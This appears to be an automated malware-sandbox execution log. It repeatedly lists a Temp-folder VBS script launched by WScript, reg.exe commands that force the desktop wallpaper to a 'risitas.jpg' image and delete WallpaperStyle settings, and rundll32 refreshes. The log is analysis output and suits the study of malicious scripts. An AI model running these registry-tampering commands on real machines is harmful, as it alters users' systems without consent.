reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
Network
Files